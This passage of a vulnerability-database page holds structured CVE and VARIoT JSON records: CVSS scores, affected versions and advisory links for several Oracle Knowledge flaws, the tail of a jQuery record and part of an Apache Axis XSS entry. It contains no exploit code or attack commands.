},
{
"url": "https://github.com/jquery/jquery/commit/753d591aea698e57d6db58c9f722cd0808619b1b"
},
{
"url": "https://www.privacy-wise.com/mitigating-cve-2019-11358-in-old-versions-of-jquery/"
},
{
"url": "https://www.oracle.com/security-alerts/cpuoct2020.html"
},
{
"url": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601"
},
{
"url": "https://www.oracle.com/security-alerts/cpujan2021.html"
},
{
"url": "https://www.oracle.com/security-alerts/cpuApr2021.html"
},
{
"url": "https://www.oracle.com//security-alerts/cpujul2021.html"
},
{
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"url": "https://supportportal.juniper.net/s/article/2021-07-Security-Bulletin-Junos-OS-Multiple-J-Web-vulnerabilities-resolved-in-Junos-OS-21-2R1"
},
{
"name": "[debian-lts-announce] 20230831 [SECURITY] [DLA 3551-1] otrs2 security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2019-11358",
"datePublished": "2019-04-19T00:00:00",
"dateReserved": "2019-04-19T00:00:00",
"dateUpdated": "2024-11-15T15:11:23.024Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2020-2522
Vulnerability from cvelistv5
Published
2020-04-15 13:29
Modified
2024-09-30 15:47
Severity ?
EPSS score ?
Summary
Vulnerability in the Oracle Knowledge product of Oracle Knowledge (component: Information Manager Console). Supported versions that are affected are 8.6.0-8.6.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Knowledge accessible data. CVSS 3.0 Base Score 4.3 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N).
References
| ▼ | URL | Tags |
|---|---|---|
| https://www.oracle.com/security-alerts/cpuapr2020.html | x_refsource_MISC |
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Oracle Corporation | Knowledge |
Version: 8.6.0-8.6.1 |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T07:09:54.466Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2020-2522",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-30T15:00:45.791718Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-30T15:47:18.903Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Knowledge",
"vendor": "Oracle Corporation",
"versions": [
{
"status": "affected",
"version": "8.6.0-8.6.1"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Vulnerability in the Oracle Knowledge product of Oracle Knowledge (component: Information Manager Console). Supported versions that are affected are 8.6.0-8.6.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Knowledge accessible data. CVSS 3.0 Base Score 4.3 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N)."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Knowledge accessible data.",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-15T13:29:43",
"orgId": "43595867-4340-4103-b7a2-9a5208d29a85",
"shortName": "oracle"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "secalert_us@oracle.com",
"ID": "CVE-2020-2522",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Knowledge",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "8.6.0-8.6.1"
}
]
}
}
]
},
"vendor_name": "Oracle Corporation"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Vulnerability in the Oracle Knowledge product of Oracle Knowledge (component: Information Manager Console). Supported versions that are affected are 8.6.0-8.6.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Knowledge accessible data. CVSS 3.0 Base Score 4.3 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N)."
}
]
},
"impact": {
"cvss": {
"baseScore": "4.3",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Knowledge accessible data."
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.oracle.com/security-alerts/cpuapr2020.html",
"refsource": "MISC",
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "43595867-4340-4103-b7a2-9a5208d29a85",
"assignerShortName": "oracle",
"cveId": "CVE-2020-2522",
"datePublished": "2020-04-15T13:29:43",
"dateReserved": "2019-12-10T00:00:00",
"dateUpdated": "2024-09-30T15:47:18.903Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2020-2932
Vulnerability from cvelistv5
Published
2020-04-15 13:29
Modified
2024-09-27 18:49
Severity ?
EPSS score ?
Summary
Vulnerability in the Oracle Knowledge product of Oracle Knowledge (component: Information Manager Console). Supported versions that are affected are 8.6.0-8.6.3. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Knowledge. CVSS 3.0 Base Score 5.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H).
References
| ▼ | URL | Tags |
|---|---|---|
| https://www.oracle.com/security-alerts/cpuapr2020.html | x_refsource_MISC |
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Oracle Corporation | Knowledge |
Version: 8.6.0-8.6.3 |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T07:23:59.285Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2020-2932",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-27T18:00:48.510523Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-27T18:49:06.282Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Knowledge",
"vendor": "Oracle Corporation",
"versions": [
{
"status": "affected",
"version": "8.6.0-8.6.3"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Vulnerability in the Oracle Knowledge product of Oracle Knowledge (component: Information Manager Console). Supported versions that are affected are 8.6.0-8.6.3. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Knowledge. CVSS 3.0 Base Score 5.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Knowledge.",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-15T13:29:53",
"orgId": "43595867-4340-4103-b7a2-9a5208d29a85",
"shortName": "oracle"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "secalert_us@oracle.com",
"ID": "CVE-2020-2932",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Knowledge",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "8.6.0-8.6.3"
}
]
}
}
]
},
"vendor_name": "Oracle Corporation"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Vulnerability in the Oracle Knowledge product of Oracle Knowledge (component: Information Manager Console). Supported versions that are affected are 8.6.0-8.6.3. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Knowledge. CVSS 3.0 Base Score 5.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)."
}
]
},
"impact": {
"cvss": {
"baseScore": "5.9",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Knowledge."
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.oracle.com/security-alerts/cpuapr2020.html",
"refsource": "MISC",
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "43595867-4340-4103-b7a2-9a5208d29a85",
"assignerShortName": "oracle",
"cveId": "CVE-2020-2932",
"datePublished": "2020-04-15T13:29:53",
"dateReserved": "2019-12-10T00:00:00",
"dateUpdated": "2024-09-27T18:49:06.282Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
cve-2020-2553
Vulnerability from cvelistv5
Published
2020-04-15 13:29
Modified
2024-09-30 15:45
Severity ?
EPSS score ?
Summary
Vulnerability in the Oracle Knowledge product of Oracle Knowledge (component: Information Manager Console). Supported versions that are affected are 8.6.0-8.6.3. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Knowledge accessible data as well as unauthorized read access to a subset of Oracle Knowledge accessible data. CVSS 3.0 Base Score 4.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N).
References
| ▼ | URL | Tags |
|---|---|---|
| https://www.oracle.com/security-alerts/cpuapr2020.html | x_refsource_MISC |
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Oracle Corporation | Knowledge |
Version: 8.6.0-8.6.3 |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T07:09:54.517Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2020-2553",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-30T15:00:42.144375Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-30T15:45:38.487Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Knowledge",
"vendor": "Oracle Corporation",
"versions": [
{
"status": "affected",
"version": "8.6.0-8.6.3"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Vulnerability in the Oracle Knowledge product of Oracle Knowledge (component: Information Manager Console). Supported versions that are affected are 8.6.0-8.6.3. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Knowledge accessible data as well as unauthorized read access to a subset of Oracle Knowledge accessible data. CVSS 3.0 Base Score 4.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N)."
}
],
"metrics": [
{
"cvssV3_0": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.0"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Knowledge accessible data as well as unauthorized read access to a subset of Oracle Knowledge accessible data.",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-04-15T13:29:43",
"orgId": "43595867-4340-4103-b7a2-9a5208d29a85",
"shortName": "oracle"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "secalert_us@oracle.com",
"ID": "CVE-2020-2553",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Knowledge",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "8.6.0-8.6.3"
}
]
}
}
]
},
"vendor_name": "Oracle Corporation"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Vulnerability in the Oracle Knowledge product of Oracle Knowledge (component: Information Manager Console). Supported versions that are affected are 8.6.0-8.6.3. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Knowledge accessible data as well as unauthorized read access to a subset of Oracle Knowledge accessible data. CVSS 3.0 Base Score 4.8 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N)."
}
]
},
"impact": {
"cvss": {
"baseScore": "4.8",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.0"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Knowledge. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Knowledge accessible data as well as unauthorized read access to a subset of Oracle Knowledge accessible data."
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://www.oracle.com/security-alerts/cpuapr2020.html",
"refsource": "MISC",
"url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "43595867-4340-4103-b7a2-9a5208d29a85",
"assignerShortName": "oracle",
"cveId": "CVE-2020-2553",
"datePublished": "2020-04-15T13:29:43",
"dateReserved": "2019-12-10T00:00:00",
"dateUpdated": "2024-09-30T15:45:38.487Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
var-201808-1040
Vulnerability from variot
Apache Axis 1.x up to and including 1.4 is vulnerable to a cross-site scripting (XSS) attack in the default servlet/services. Apache Axis is an open source, XML-based Web service architecture of the Apache Software Foundation in the United States. It includes SOAP servers implemented in Java and C++ languages, as well as various public services and APIs to generate and deploy Web services. application. A remote attacker can exploit this vulnerability to inject arbitrary web script or HTML
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201808-1040",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "communications asap cartridges",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.2"
},
{
"model": "siebel ui framework",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "21.0"
},
{
"model": "communications element manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.0"
},
{
"model": "agile product lifecycle management framework",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "9.3.3"
},
{
"model": "flexcube core banking",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.8.0"
},
{
"model": "communications asap cartridges",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.3"
},
{
"model": "endeca information discovery studio",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "3.2.0"
},
{
"model": "communications element manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0"
},
{
"model": "flexcube private banking",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.0.0"
},
{
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.1"
},
{
"model": "enterprise manager for fusion middleware",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1.0.5"
},
{
"model": "hospitality guest access",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "4.2.1"
},
{
"model": "webcenter portal",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"model": "policy automation connector for siebel",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "10.4.6"
},
{
"model": "secure global desktop",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "5.5"
},
{
"model": "axis",
"scope": "gte",
"trust": 1.0,
"vendor": "apache",
"version": "1.0"
},
{
"model": "retail order broker",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "15.0"
},
{
"model": "retail order broker",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.0"
},
{
"model": "instantis enterprisetrack",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "17.1"
},
{
"model": "secure global desktop",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "5.4"
},
{
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.58"
},
{
"model": "communications design studio",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.3.4.3.0"
},
{
"model": "financial services funds transfer pricing",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.2"
},
{
"model": "financial services analytical applications infrastructure",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "7.3.5"
},
{
"model": "communications network integrity",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.3.5"
},
{
"model": "communications session route manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.1"
},
{
"model": "instantis enterprisetrack",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "17.3"
},
{
"model": "primavera unifier",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.7"
},
{
"model": "retail order broker",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.0"
},
{
"model": "hospitality guest access",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "4.2.0"
},
{
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.12"
},
{
"model": "communications element manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"model": "primavera gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.2.11"
},
{
"model": "rapid planning",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1"
},
{
"model": "retail xstore point of service",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.1"
},
{
"model": "tuxedo",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1.1.0.0"
},
{
"model": "tuxedo",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1.3"
},
{
"model": "knowledge",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.6.0"
},
{
"model": "communications order and service management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.3.0.0.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"model": "communications session report manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.0"
},
{
"model": "peoplesoft enterprise human capital management human resources",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "9.2"
},
{
"model": "financial services analytical applications infrastructure",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.8"
},
{
"model": "financial services funds transfer pricing",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.7"
},
{
"model": "communications session report manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0"
},
{
"model": "agile engineering data management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "6.2.1.0"
},
{
"model": "primavera unifier",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "17.12"
},
{
"model": "flexcube private banking",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1.0"
},
{
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.56"
},
{
"model": "peoplesoft enterprise peopletools",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.57"
},
{
"model": "big data discovery",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "1.6"
},
{
"model": "rapid planning",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2"
},
{
"model": "instantis enterprisetrack",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "17.2"
},
{
"model": "axis",
"scope": "lte",
"trust": 1.0,
"vendor": "apache",
"version": "1.4"
},
{
"model": "communications session route manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"model": "flexcube core banking",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.10.0"
},
{
"model": "real-time decision server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "3.2.1.0"
},
{
"model": "internet directory",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.3.0"
},
{
"model": "internet directory",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.4.0"
},
{
"model": "application testing suite",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.2.0.1"
},
{
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "16.2"
},
{
"model": "communications order and service management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.4"
},
{
"model": "primavera unifier",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "18.8"
},
{
"model": "enterprise manager base platform",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.1.0.5"
},
{
"model": "communications design studio",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.3.5.5.0"
},
{
"model": "financial services analytical applications infrastructure",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "7.3.3"
},
{
"model": "financial services compliance regulatory reporting",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.8"
},
{
"model": "primavera gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "17.12.6"
},
{
"model": "communications session report manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.1.0"
},
{
"model": "communications design studio",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.4.1.1.0"
},
{
"model": "application testing suite",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.3.0.1"
},
{
"model": "communications session route manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.2.0"
},
{
"model": "communications design studio",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "7.4.0.4.0"
},
{
"model": "communications session route manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0"
},
{
"model": "flexcube core banking",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.7.0"
},
{
"model": "financial services analytical applications infrastructure",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.0"
},
{
"model": "flexcube core banking",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.9.0"
},
{
"model": "communications session report manager",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
